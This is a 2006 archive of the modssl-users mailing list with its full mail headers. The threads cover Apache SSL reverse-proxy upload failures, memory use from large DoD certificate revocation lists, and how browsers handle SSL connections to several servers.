> > are using a reverse proxy, and it only affects the application of the
> > BrowserMatch statement - if you don't have the BrowserMatch, it has no
> > effect.
> >
> > joe
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
>
> --
> --------------------------------------------------
> Ken Chen
>


--
--------------------------------------------------
Ken Chen
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 21 22:47:19 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id F0E4C14D898; Fri, 21 Apr 2006 22:47:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ojgate.hill.af.mil (ojgate.hill.af.mil [137.241.250.109])
	by master.modssl.org (Postfix) with ESMTP id 4E1E714D83E
	for ; Fri, 21 Apr 2006 22:47:17 +0200 (CEST)
Received: from ap-hill-tm2.hill.afmc.ds.af.mil (ap-hill-tm2.hill.af.mil [137.241.230.81])
	by ojgate.hill.af.mil with SMTP id k3LKkvfg018034
	for ; Fri, 21 Apr 2006 14:46:57 -0600 (MDT)
Received: from fskrsm12.hill.af.mil ([137.241.230.92])
 by ap-hill-tm2.hill.afmc.ds.af.mil (SMSSMTP 4.1.11.41) with SMTP id M2006042114471515668
 for ; Fri, 21 Apr 2006 14:47:15 -0600
Received: by fskrsm12.hill.afmc.ds.af.mil with Internet Mail Service (5.5.2657.72)
	id <20YSWZNX>; Fri, 21 Apr 2006 14:47:15 -0600
Message-ID: <3727C3C729EAA545A6E97E420BCF649E015D5225@fskrsm24.hill.afmc.ds.af.mil>
From: Walls Rob W Contr 75 CS/SCBS 
To: "'modssl-users@modssl.org'" 
Subject: CRL Checking Uses Excessive Memory
Date: Fri, 21 Apr 2006 14:47:15 -0600
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Walls Rob W Contr 75 CS/SCBS 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I work for the DoD. We have about a dozen CA's with their own CRL files.
Some of these are over 20M in size. When CRL checking is enabled in Apache
(for Linux or Windows), memory use is excessive and httpd processes are
killed by the OS (Linux) due to out of memory conditions and all the memory
swapping activity sends the proc utilization way up there and makes the
server unresponsive. On Windows the CPU use just pegs at 100% (I have no
idea what else is going on in there).
CRL's are downloaded every day and openssl is used to make hash'd file names
(ssl.conf is using  SSLCARevocationPath). I don't currently restart apache
after retrieving the new CRL files.
The Linux machine runs redhat with dual 3ghz xeons and 2Gb ram. SSL works
great, but as soon as CRLs are checked, apache starts to go south! I have a
2Gb swap partition and have added another 2Gb swap file to at least keep
things running, but it becomes so slow it might as well crash.
Each httpd process goes from using about 14Mb of memory when not CRL
checking to 250Mb when CRL checking is enabled!
BTW: anywhere from 10 to 20 concurrent httpd processes are normal for that
machine.

Any ideas on how to use large CRL's in Apache? 

Do I just need more memory?

If Apache can't use many large CRL files, would an OSCP solution side-step
these problems? Any good ones out there?
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 21 23:11:14 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CC0A214D89E; Fri, 21 Apr 2006 23:11:14 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from acrux.ligo.caltech.edu (acrux.ligo.caltech.edu [131.215.115.14])
	by master.modssl.org (Postfix) with ESMTP id 0794C14D898
	for ; Fri, 21 Apr 2006 23:11:10 +0200 (CEST)
Received: from tarazed.ligo.caltech.edu (tarazed [131.215.115.31])
	by acrux.ligo.caltech.edu (8.12.11/8.12.11) with ESMTP id k3LLB9gF001207
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
	for ; Fri, 21 Apr 2006 14:11:09 -0700 (PDT)
Received: from tarazed.ligo.caltech.edu (localhost.localdomain [127.0.0.1])
	by tarazed.ligo.caltech.edu (8.13.6/8.13.4) with ESMTP id k3LLB3da003995
	for ; Fri, 21 Apr 2006 14:11:03 -0700
Received: (from pehrens@localhost)
	by tarazed.ligo.caltech.edu (8.13.6/8.13.4/Submit) id k3LLB3F7003994
	for modssl-users@modssl.org; Fri, 21 Apr 2006 14:11:03 -0700
Date: Fri, 21 Apr 2006 14:11:03 -0700
From: Phil Ehrens 
To: modssl-users@modssl.org
Subject: Re: CRL Checking Uses Excessive Memory
Message-ID: <20060421211103.GA2073@ligo.caltech.edu>
References: <3727C3C729EAA545A6E97E420BCF649E015D5225@fskrsm24.hill.afmc.ds.af.mil>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3727C3C729EAA545A6E97E420BCF649E015D5225@fskrsm24.hill.afmc.ds.af.mil>
Shoe-Size: 9-1/2
User-Agent: Mutt/1.5.10i
X-Spam-Score: undef - Domain Whitelisted (ligo.caltech.edu: )
X-Canit-Stats-ID: 3270231 - 42ab062e3eee
X-Scanned-By: CanIt (www . roaringpenguin . com) on 131.215.115.14
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Phil Ehrens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I think the first thing you need to do is connect to this URL
from someplace that doesn't have any certs related to you
installed, like your local library:

https://www.hill.af.mil/main/index.html

I am not trying to be funny, I am just worried that either you
are going to get yourself into trouble by exposing configuration
info about .mil computers, or somebody else is going to get into
trouble while trying to help you.

Phil

Walls Rob W Contr 75 CS/SCBS wrote:
> I work for the DoD. We have about a dozen CA's with their own CRL files.
> Some of these are over 20M in size. When CRL checking is enabled in Apache
> (for Linux or Windows), memory use is excessive and httpd processes are
> killed by the OS (Linux) due to out of memory conditions and all the memory
> swapping activity sends the proc utilization way up there and makes the
> server unresponsive. On Windows the CPU use just pegs at 100% (I have no
> idea what else is going on in there).
> CRL's are downloaded every day and openssl is used to make hash'd file names
> (ssl.conf is using  SSLCARevocationPath). I don't currently restart apache
> after retrieving the new CRL files.
> The Linux machine runs redhat with dual 3ghz xeons and 2Gb ram. SSL works
> great, but as soon as CRLs are checked, apache starts to go south! I have a
> 2Gb swap partition and have added another 2Gb swap file to at least keep
> things running, but it becomes so slow it might as well crash.
> Each httpd process goes from using about 14Mb of memory when not CRL
> checking to 250Mb when CRL checking is enabled!
> BTW: anywhere from 10 to 20 concurrent httpd processes are normal for that
> machine.
> 
> Any ideas on how to use large CRL's in Apache? 
> 
> Do I just need more memory?
> 
> If Apache can't use many large CRL files, would an OSCP solution side-step
> these problems? Any good ones out there?
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
Phil Ehrens | Fun stuff:
The LIGO Laboratory, MS 18-34         | http://www.ralphmag.org
California Institute of Technology    | http://www.yellow5.com
1200 East California Blvd.            | http://www.tokyotosho.com
Pasadena, CA 91125 USA                | My gpg public key:
Phone:(626)395-8518 Fax:(626)793-9744 | http://www.imbe.net/peligo.asc
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 21 23:34:08 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E351014D898; Fri, 21 Apr 2006 23:34:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mtawhl2.disanet.disa-u.mil (mtawhl2.pac.disa.mil [198.22.28.4])
	by master.modssl.org (Postfix) with ESMTP id 4A87B14D83E
	for ; Fri, 21 Apr 2006 23:34:06 +0200 (CEST)
Received: by mtawhl2.pac.disa.mil with Internet Mail Service (5.5.2657.72)
	id ; Fri, 21 Apr 2006 11:33:59 -1000
Message-ID: <8B3BECEEF7677D4F96CC9C9E2AB9DE7D02B7DDDF@emswhl1.pac.disa.mil>
From: "Victor, Dwight P CTR DISA PAC" 
To: "'modssl-users@modssl.org'" 
Subject: RE: CRL Checking Uses Excessive Memory
Date: Fri, 21 Apr 2006 11:33:56 -1000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Victor, Dwight P CTR DISA PAC" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Phil,

As far as I know, nothing that Rob mentioned is classified...especially
since he is not naming systems by name or address.  The fact that the DoD
uses certificates is no secret...there's been many writeups in the various
trade magazines regarding the DoD's push to PKI.

Dwight...

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Phil Ehrens
Sent: Friday, April 21, 2006 11:11 AM
To: modssl-users@modssl.org
Subject: Re: CRL Checking Uses Excessive Memory


I think the first thing you need to do is connect to this URL
from someplace that doesn't have any certs related to you
installed, like your local library:

https://www.hill.af.mil/main/index.html

I am not trying to be funny, I am just worried that either you
are going to get yourself into trouble by exposing configuration
info about .mil computers, or somebody else is going to get into
trouble while trying to help you.

Phil

Walls Rob W Contr 75 CS/SCBS wrote:
> I work for the DoD. We have about a dozen CA's with their own CRL files.
> Some of these are over 20M in size. When CRL checking is enabled in Apache
> (for Linux or Windows), memory use is excessive and httpd processes are
> killed by the OS (Linux) due to out of memory conditions and all the
memory
> swapping activity sends the proc utilization way up there and makes the
> server unresponsive. On Windows the CPU use just pegs at 100% (I have no
> idea what else is going on in there).
> CRL's are downloaded every day and openssl is used to make hash'd file
names
> (ssl.conf is using  SSLCARevocationPath). I don't currently restart apache
> after retrieving the new CRL files.
> The Linux machine runs redhat with dual 3ghz xeons and 2Gb ram. SSL works
> great, but as soon as CRLs are checked, apache starts to go south! I have
a
> 2Gb swap partition and have added another 2Gb swap file to at least keep
> things running, but it becomes so slow it might as well crash.
> Each httpd process goes from using about 14Mb of memory when not CRL
> checking to 250Mb when CRL checking is enabled!
> BTW: anywhere from 10 to 20 concurrent httpd processes are normal for that
> machine.
> 
> Any ideas on how to use large CRL's in Apache? 
> 
> Do I just need more memory?
> 
> If Apache can't use many large CRL files, would an OSCP solution side-step
> these problems? Any good ones out there?
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
Phil Ehrens | Fun stuff:
The LIGO Laboratory, MS 18-34         | http://www.ralphmag.org
California Institute of Technology    | http://www.yellow5.com
1200 East California Blvd.            | http://www.tokyotosho.com
Pasadena, CA 91125 USA                | My gpg public key:
Phone:(626)395-8518 Fax:(626)793-9744 | http://www.imbe.net/peligo.asc
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr 22 00:56:42 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 17A3914D88E; Sat, 22 Apr 2006 00:56:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mtawhl1.disanet.disa-u.mil (mtawhl1.pac.disa.mil [198.22.28.3])
	by master.modssl.org (Postfix) with ESMTP id 63BF814D835
	for ; Sat, 22 Apr 2006 00:56:40 +0200 (CEST)
Received: by mtawhl1.pac.disa.mil with Internet Mail Service (5.5.2657.72)
	id ; Fri, 21 Apr 2006 12:56:33 -1000
Message-ID: <8B3BECEEF7677D4F96CC9C9E2AB9DE7D02B7DDE2@emswhl1.pac.disa.mil>
From: "Victor, Dwight P CTR DISA PAC" 
To: "'modssl-users@modssl.org'" 
Subject: RE: CRL Checking Uses Excessive Memory
Date: Fri, 21 Apr 2006 12:56:30 -1000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Victor, Dwight P CTR DISA PAC" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Rob,

I also work for the DoD and am using the same CRLs as you (downloaded and
converted on a daily basis).  We're running a Linux webserver with a single
1.8Ghz Celeron, 512MB of RAM, and 1GB of swap.

I haven't noticed any memory issues when checking CRLs.

My Apache server starts multiple child servers.  It looks like the child
servers hit around 60MB of memory usage (max) when processing CRL checks;
500KB to 1MB seems to be the average child server's memory usage when idle.

top says my current load average is about 0.03, 0.01, 0.00.  When checking
CRLs, top says my load average zooms up to around 0.20, 0.05, 0.01.

Of course, my userbase is very small and we aren't doing a ton of CRL
checks.

OCSP should resolve your issue with plowing through the CRLs, however, I
have yet to find a viable OCSP solution.  There was a patch for mod_ssl, but
I haven't heard anything about it since it was last released in 2004.  Maybe
someone else on this list knows?

Rob, why don't you email me offline.  I'm in the DISA GAL, if you can get to
that.

Dwight...

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Walls Rob W Contr 75
CS/SCBS
Sent: Friday, April 21, 2006 10:47 AM
To: 'modssl-users@modssl.org'
Subject: CRL Checking Uses Excessive Memory


I work for the DoD. We have about a dozen CA's with their own CRL files.
Some of these are over 20M in size. When CRL checking is enabled in Apache
(for Linux or Windows), memory use is excessive and httpd processes are
killed by the OS (Linux) due to out of memory conditions and all the memory
swapping activity sends the proc utilization way up there and makes the
server unresponsive. On Windows the CPU use just pegs at 100% (I have no
idea what else is going on in there).
CRL's are downloaded every day and openssl is used to make hash'd file names
(ssl.conf is using  SSLCARevocationPath). I don't currently restart apache
after retrieving the new CRL files.
The Linux machine runs redhat with dual 3ghz xeons and 2Gb ram. SSL works
great, but as soon as CRLs are checked, apache starts to go south! I have a
2Gb swap partition and have added another 2Gb swap file to at least keep
things running, but it becomes so slow it might as well crash.
Each httpd process goes from using about 14Mb of memory when not CRL
checking to 250Mb when CRL checking is enabled!
BTW: anywhere from 10 to 20 concurrent httpd processes are normal for that
machine.

Any ideas on how to use large CRL's in Apache? 

Do I just need more memory?

If Apache can't use many large CRL files, would an OSCP solution side-step
these problems? Any good ones out there?
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr 22 05:01:08 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2FF7614D89D; Sat, 22 Apr 2006 05:01:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.201])
	by master.modssl.org (Postfix) with ESMTP id A0FBB14D835
	for ; Sat, 22 Apr 2006 05:01:07 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id s19so370714wxc
        for ; Fri, 21 Apr 2006 20:01:06 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=ieo9N4sApTYPkgfL6ZAfq/K6FZBj//NL8F/oSXaM2fV2UFX7inwoDdDkL61ULT6rzoE672B9v5uKfYTHUAdTbs6jmOreQBNlz8hcoqp+oDYF1H96yOxXhFzEUb5TwhLRezCLbam+MqG5D1oF1dlNKdduRc5N0OODjd245hyxk6E=
Received: by 10.70.40.18 with SMTP id n18mr1071588wxn;
        Fri, 21 Apr 2006 20:01:05 -0700 (PDT)
Received: by 10.70.13.13 with HTTP; Fri, 21 Apr 2006 20:01:05 -0700 (PDT)
Message-ID: 
Date: Sat, 22 Apr 2006 11:01:05 +0800
From: "Ken Chen" 
To: modssl-users@modssl.org
Subject: Re: Failed uploading file to Appache HTTP Server after using SSL
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: 
	 
	 
	 
	 <20060421061859.GA1326@redhat.com>
	 
	 <20060421072628.GA1851@redhat.com>
	 
	 
	 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ken Chen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

FYI.

I have tried to test upload with Firefox.  But it turns out that it
fails too.  Then, it might not be only a MSIE issue.



On 4/22/06, Ken Chen  wrote:
> Hi,
>
> My colleague has helped to deploy the patch and the ssl vhost has been
> configured as follow:
> 
>         DocumentRoot "/home/server/webpage"
>         ServerName 192.168.2.130:443
>         LogLevel debug
>         ErrorLog logs/ssl-error_log
>         CustomLog logs/ssl-access_log common
>
>         BrowserMatch ".*MSIE.*" \
>         nokeepalive ssl-unclean-shutdown \
>         downgrade-1.0 force-response-1.0
>
>         ProxyPass /eservices http://localhost:8855/eservices
>         ProxyPassReverse /eservices http://localhost:8855/eservices
>
>         Alias /eservices-webpage/ /home/server/webpage/
>
> SSLEngine on
> SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:=
+eNULL
> SSLCertificateFile someCrt.crt
> SSLCertificateKeyFile someKey.key
> 
>
> But seems the problem remains: Page can't be displayed.  I found no
> error in log (maybe I was not able to found).  Here attached the log
> when I press upload to upload file.
>
>
> Ken
>
>
> On 4/21/06, Ken Chen  wrote:
> > Joe,
> >
> > Do you mind telling me how to apply the patch?  Type command as follow?
> > patch -s < xxxx.patch
> >
> > Do I need to stop the httpd server?  or recompile or anything else?
> >
> > Thanks.
> >
> >
> > On 4/21/06, Ken Chen  wrote:
> > > ic.  Thanks so much.  I will apply that patch and see what is going o=
n later.
> > >
> > >
> > > On 4/21/06, Joe Orton  wrote:
> > > > On Fri, Apr 21, 2006 at 03:19:35PM +0800, Ken Chen wrote:
> > > > > Hi Joe,
> > > > >
> > > > > We are using 2.0.55 already.  Is it already include that patch?
> > > >
> > > > No, it will be in 2.0.56 and later.  But note this only applies if =
you
> > > > are using a reverse proxy, and it only affects the application of t=
he
> > > > BrowserMatch statement - if you don't have the BrowserMatch, it has=
 no
> > > > effect.
> > > >
> > > > joe
> > > > ___________________________________________________________________=
___
> > > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.=
org
> > > > User Support Mailing List                      modssl-users@modssl.=
org
> > > > Automated List Manager                            majordomo@modssl.=
org
> > > >
> > >
> > >
> > > --
> > > --------------------------------------------------
> > > Ken Chen
> > >
> >
> >
> > --
> > --------------------------------------------------
> > Ken Chen
> >
>
>
> --
> --------------------------------------------------
> Ken Chen
>
>
>


--
--------------------------------------------------
Ken Chen
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 25 01:33:07 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id AE94614D866; Tue, 25 Apr 2006 01:33:06 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pproxy.gmail.com (pproxy.gmail.com [64.233.166.176])
	by master.modssl.org (Postfix) with ESMTP id 381B614D84E
	for ; Tue, 25 Apr 2006 01:33:05 +0200 (CEST)
Received: by pproxy.gmail.com with SMTP id b29so1176483pya
        for ; Mon, 24 Apr 2006 16:33:04 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type;
        b=YPeCVn4kAlM0NaM6Rf63ANexc+6AG/xKZf3a/wi/iaJEA6WpG6WY88uVi/qY9afX5Ynr4AGOD7DobrECBUkVh1muvrmREAtsusD+x3FE44e9pPl9keOCbNqR0xKGcQucR6PiuPn53+RjzxJbY9FbBsJZCwOpzLB5Vpju1wDUaeM=
Received: by 10.35.34.18 with SMTP id m18mr1595888pyj;
        Mon, 24 Apr 2006 16:33:03 -0700 (PDT)
Received: by 10.35.114.3 with HTTP; Mon, 24 Apr 2006 16:33:03 -0700 (PDT)
Message-ID: 
Date: Tue, 25 Apr 2006 01:33:03 +0200
From: Vishwas 
To: modssl-users@modssl.org
Subject: A SSL scenario (involving multiple SSL-servers)
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_8654_23422614.1145921583966"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Vishwas 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_8654_23422614.1145921583966
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Hello there,

I have few doubts, the scenario goes as below.

Scenario: There are 4 SSL-enabled Apache servers {A1, A2, A3, A4}, all of
them independently controlled and have valid certificates. Now, a "user" on
A1 designs an HTML page (index.html) that refers to images from all the 4
servers. The links to these images are specified in the HTML file using "
https://A[1-4]/..."

Questions:
1. A request for https://A1/~user/index.html comes, The requestor is going
to get a SSL connection from A1. And the content from A1 to the browser is
flowing through the SSL-tunnel. I think only the files that reside on A1 ar=
e
going to flow through this tunnel from A1 to the browser!? And the files
from A2, A3, and A4 are flowing through separate SSL-tunnels to the
browser!? Then the browser shows only one PADLOCK symbol, will it be for A1=
?
YES. Then what about the SSL-connections from A2, A3, and A4? How does
browser tells its user about these connections?

2. Or does A1 brings the files from A2, A3, and A4 that referred inside the
"index.html" file by the "user" and serves to the browser?

Am confused. Because my understanding was SSL is Secure socket layer, and
one cannot tamper with this tunnel. And I used to think, when I ask the
browser to open some URL, it opens a connection (by obtaining a socket, say
56789, from underlying OS) to the port 80 of URL server. Now I feel, if the
URL page has objects residing on other servers, my browser opens separate
sockets (different from 56789) for these objects.!? Please clarify my
doubts. Or point me to some guides et al.

Thank you for your patience.

--
Best Regards,
Vishwas.

------=_Part_8654_23422614.1145921583966
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Hello there,

I have few doubts, the scenario goes as below.

S=
cenario: There are 4 SSL-enabled Apache servers {A1, A2, A3, A4}, all of th=
em independently controlled and have valid certificates. Now, a "user&=
quot; on A1 designs an HTML page (
index.html) that refers to images from all the 4 servers. The links to thes=
e images are specified in the HTML file using "https://A[1-4]/..."

Questions:
1. A request for=
=20
https://A1/~user/index.html com=
es, The requestor is going to get a SSL connection from A1. And the content=
 from A1 to the browser is flowing through the SSL-tunnel. I think only the=
 files that reside on A1 are going to flow through this tunnel from A1 to t=
he browser!? And the files from A2, A3, and A4 are flowing through separate=
 SSL-tunnels to the browser!? Then the browser shows only one PADLOCK symbo=
l, will it be for A1? YES. Then what about the SSL-connections from A2, A3,=
 and A4? How does browser tells its user about these connections?


2. Or does A1 brings the files from A2, A3, and A4 that referred in=
side the "index.html" file by the "user" and serves to =
the browser?

Am confused. Because my understanding was SSL is Secure=
 socket layer, and one cannot tamper with this tunnel. And I used to think,=
 when I ask the browser to open some URL, it opens a connection (by obtaini=
ng a socket, say 56789, from underlying OS) to the port 80 of URL server. N=
ow I feel, if the URL page has objects residing on other servers, my browse=
r opens separate sockets (different from 56789) for these objects.!? Please=
 clarify my doubts. Or point me to some guides et al.


Thank you for your patience.

-- 
Best Regar=
ds,
Vishwas.

------=_Part_8654_23422614.1145921583966--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 25 15:37:14 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8EDB014D89D; Tue, 25 Apr 2006 15:37:14 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nproxy.gmail.com (nproxy.gmail.com [64.233.182.184])
	by master.modssl.org (Postfix) with ESMTP id 5DF7814D83D
	for ; Tue, 25 Apr 2006 15:37:13 +0200 (CEST)
Received: by nproxy.gmail.com with SMTP id y25so919528nfb
        for ; Tue, 25 Apr 2006 06:37:12 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=VytSqW7m3AQnZ2wY0/qJfEZuWcMdiv9YTuj9JwdBG3TZEAXgGErcey+4clj80zCFR+T31aNtty3ZXOUXIA8k8Uo+bn4f7jLo7u7L94tuR5MsiLBcJwMXl7oZj3M3G003CHdPpGaostoDDqvqDBjBv9S0b9UeZ1NxQvbWsFJq8oQ=
Received: by 10.48.30.9 with SMTP id d9mr1224248nfd;
        Tue, 25 Apr 2006 06:37:12 -0700 (PDT)
Received: by 10.49.91.20 with HTTP; Tue, 25 Apr 2006 06:37:12 -0700 (PDT)
Message-ID: 
Date: Tue, 25 Apr 2006 09:37:12 -0400
From: "BJ Swope" 
To: modssl-users@modssl.org
Subject: Re: A SSL scenario (involving multiple SSL-servers)
In-Reply-To: 
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_5802_12525336.1145972232568"
References: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "BJ Swope" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_5802_12525336.1145972232568
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Every item the browser requests, such as images, comes from a
unique/distinct connection.

So the links to the other web servers will result in independent connection=
s
to the other web servers.  So you should be good to go.



On 4/24/06, Vishwas  wrote:
>
> Hello there,
>
> I have few doubts, the scenario goes as below.
>
> Scenario: There are 4 SSL-enabled Apache servers {A1, A2, A3, A4}, all of
> them independently controlled and have valid certificates. Now, a "user" =
on
> A1 designs an HTML page ( index.html) that refers to images from all the =
4
> servers. The links to these images are specified in the HTML file using "
> https://A[1-4]/..."
>
> Questions:
> 1. A request for https://A1/~user/index.htmlcomes, The requestor is going to get a SSL connection from A1. And the
> content from A1 to the browser is flowing through the SSL-tunnel. I think
> only the files that reside on A1 are going to flow through this tunnel fr=
om
> A1 to the browser!? And the files from A2, A3, and A4 are flowing through
> separate SSL-tunnels to the browser!? Then the browser shows only one
> PADLOCK symbol, will it be for A1? YES. Then what about the SSL-connectio=
ns
> from A2, A3, and A4? How does browser tells its user about these
> connections?
>
> 2. Or does A1 brings the files from A2, A3, and A4 that referred inside
> the "index.html" file by the "user" and serves to the browser?
>
> Am confused. Because my understanding was SSL is Secure socket layer, and
> one cannot tamper with this tunnel. And I used to think, when I ask the
> browser to open some URL, it opens a connection (by obtaining a socket, s=
ay
> 56789, from underlying OS) to the port 80 of URL server. Now I feel, if t=
he
> URL page has objects residing on other servers, my browser opens separate
> sockets (different from 56789) for these objects.!? Please clarify my
> doubts. Or point me to some guides et al.
>
> Thank you for your patience.
>
> --
> Best Regards,
> Vishwas.
>

------=_Part_5802_12525336.1145972232568
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Every item the browser requests, such as images, comes from a unique/distin=
ct connection.



So the links to the other web servers will result in independent
connections to the other web servers.  So you should be good to go.




On 4/24/06, Vishwas <ivishwas@gmai=
l.com> wrote:


Hello there,

I have few doubts, the s=
cenario goes as below.

Scenario:
There are 4 SSL-enabled Apache servers {A1, A2, A3, A4}, all of them
independently controlled and have valid certificates. Now, a "user&quo=
t; on
A1 designs an HTML page (
index.html) that refers to images from all the 4 servers. The links to
these images are specified in the HTML file using "https://A[1-4]/.=
.."

Questions:
1. A request for=20
https://A1/~user/index.html
comes, The requestor is going to get a SSL connection from A1. And the
content from A1 to the browser is flowing through the SSL-tunnel. I
think only the files that reside on A1 are going to flow through this
tunnel from A1 to the browser!? And the files from A2, A3, and A4 are
flowing through separate SSL-tunnels to the browser!? Then the browser
shows only one PADLOCK symbol, will it be for A1? YES. Then what about
the SSL-connections from A2, A3, and A4? How does browser tells its
user about these connections?


2. Or does A1 brings the files from A2, A3, and A4 that
referred inside the "index.html" file by the "user" and=
 serves to the
browser?

